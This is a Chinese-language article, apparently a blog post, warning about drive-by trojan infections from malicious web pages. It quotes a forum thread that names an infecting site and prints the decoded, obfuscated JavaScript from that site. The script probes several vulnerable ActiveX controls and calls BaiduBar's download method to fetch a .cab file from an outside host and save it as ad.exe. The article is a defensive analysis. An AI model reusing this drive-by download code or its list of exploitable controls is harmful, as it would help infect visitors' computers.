木马的主要入侵途径--网页种马

现在, 木马和病毒利用第三方软件漏洞侵入系统手段越来越频繁 - 只要你浏览恶意网站就很有可能中招, 而且恶意网也通过变换不同的域名网址来躲避搜索引擎和安全公司的评估. 所以, 当务之急, 用户需要作好足够的防御措施, 包括备份系统和重要资料, 安装杀毒软件和防火墙, 及时更新系统, 特别是有漏洞的第三方软件! 还有不要随便点别人发的联接和点击安全评估为恶意网站的联接.

以下是个利用第三方软件漏洞的例子:

laowang627说：

现在网吧又出现新木马。进程里出现好多cmd.exe和ftp.exe

中毒后网吧老掉线

还原没被穿透。重起一下没有了

我只知道不官打开什么游戏或网站有很少机率会弹出这个网站就中毒了。

网站地址:http://www.lidoo.net.cn/free.asp?uid=1

别的病毒网站不知道，我就见到这个网站有毒。

请360提取样本解决。谢谢！！

greedwind说：

代码反译出来了, 是利用Microsoft很老的漏洞XMLHTTP和播放器的漏洞来下载和直接运行执行文件EXE的.

(后注: 原来的代码是16进制的, 当我后来访问该网的时候, 代码有所变动. 看以下代码, 普通JAVACRIPT的程序偏要写成吞吞吐吐, 而且用16进制简单\"加密\". 这是木马程序为了躲避杀软的追杀 - 稍微加点东西就好象不一样的代码了. 所以如果你的系统有漏洞, 单靠杀软来防御是远远不够的. 这也是上网浏览网页的时候会中木马病毒的最直接原因!)

?/*00000000000000000000000000000*/

try{if(new ActiveXObject(\"M\"+\"i\"+\"cro\"+\"so\"+\"ft.X\"+\"ML\"+\"H\"+\"TT\"+\"P\"))window[\"document\"][\"write\"](\'\')}catch(e){};

try{if(new ActiveXObject(\"IE\"+\"RP\"+\"Ctl.IER\"+\"PC\"+\"tl.1\"))window[\"document\"][\"write\"](\'\')}catch(e){};

try{if(new ActiveXObject(\"M\"+\"PS.S\"+\"to\"+\"rm\"+\"Pl\"+\"ay\"+\"er\"))window[\"document\"][\"write\"](\'\')}catch(e){};

try{if(new ActiveXObject(\"P\"+\"OW\"+\"ER\"+\"PLA\"+\"YE\"+\"R.Powe\"+\"rPlay\"+\"erC\"+\"trl.1\"))window[\"document\"][\"write\"](\'\')}catch(e){};

/*00000000000000000000000000000*/

try{if(new ActiveXObject(\"GLCH\"+\"AT.GLCh\"+\"atCtrl.1\"))window[\"document\"][\"write\"](\'\')}catch(e){};

try{if(new ActiveXObject(\"DP\"+\"Cli\"+\"ent.V\"+\"od\"))window[\"document\"][\"write\"](\'\')}catch(e){};

/*00000000000000000000000000000*/

var obj=new ActiveXObject(\"B\"+\"a\"+\"id\"+\"u\"+\"B\"+\"a\"+\"r.T\"+\"o\"+\"o\"+\"l\");if(obj){obj.DloadDS(\"http://u.c\"+\"ncz.us/d/a\"+\"d.\"+\"c\"+\"ab\",\"ad.exe\",0)};

/*00000000000000000000000000000*/?

greedwind又说：

根据上面的代码, 可以很容易知道这些有问题的控件:

Microsoft.XMLHTTP 这个不用说了, 前面说过了, 微软的漏洞

IERPCtl.IERPCtl.1 realplayer的漏洞

MPS.StormPlayer 暴风影音的漏洞

POWERPLAYER.PowerPlayerCtrl.1 POWERPLAYER的漏洞

GLCHAT.GLChatCtrl.1 联众游戏聊天室组件漏洞洞

DPClient.Vod 迅雷漏洞

BaiduBar.Tool 百度超级搜霸漏洞

我xxx, 有些不出名的控件都找到漏洞了! 黑客就黑啊!怎么我就找不出这些漏洞啊!水平有限